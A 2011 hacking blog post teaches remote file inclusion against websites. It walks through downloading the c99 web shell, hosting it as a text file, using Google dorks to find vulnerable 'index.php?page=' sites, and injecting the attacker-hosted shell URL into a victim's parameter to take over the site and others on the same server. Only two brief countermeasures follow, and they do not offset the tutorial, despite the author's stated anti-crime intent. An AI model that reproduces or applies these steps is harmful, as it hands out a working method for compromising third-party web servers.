Popular Posts

About Me

My photo
My blog is not for teaching hacking. I am an engineer by profession and trying to understand about these hidden criminals and their world. The honest intention behind ‘unite hackers’ is to prevent young computer techies from getting in to crime. This book has thrown light on various sensitive issues relating to hacking and hackers. There are so various aspects discussed in it on humanitarian ground.

Sunday, March 6, 2011

Remote File Inclusion (RFI) | Website Hacking

Before starting this tutorial, I would like to tell you about a piece of code called as  shell. There are many shells available . Lets consider a shell known as c99 shell. First download it from here.
Now signup for a account on any free web hosting site . Say 110mb.com.  Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of  shell you uploaded.

http://username.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.

Both images are showing the filemanager, In Ist I am accesing by signing into my account and 2nd just by accessing shell without logging into.
                                 




I just wanted to show you that Imagine if anybody somehow upload  this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.




Note:Your account might be suspended after uploading such shells.


What is Remote File Inclusion ?

As clear from the name, Remote File inclusion means 'including a remote file' . RFI is a vulneribility found in websites that allow attackers to include a remote file on the webserver. This may lead to remote code execution and complete compromise of system.

How to perform attack ?

Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step3.  Lets say you  got any site like
http://www.victim.com/index.php?page=anything

Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.

Possible Countermeasures :
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini .

No comments:

Post a Comment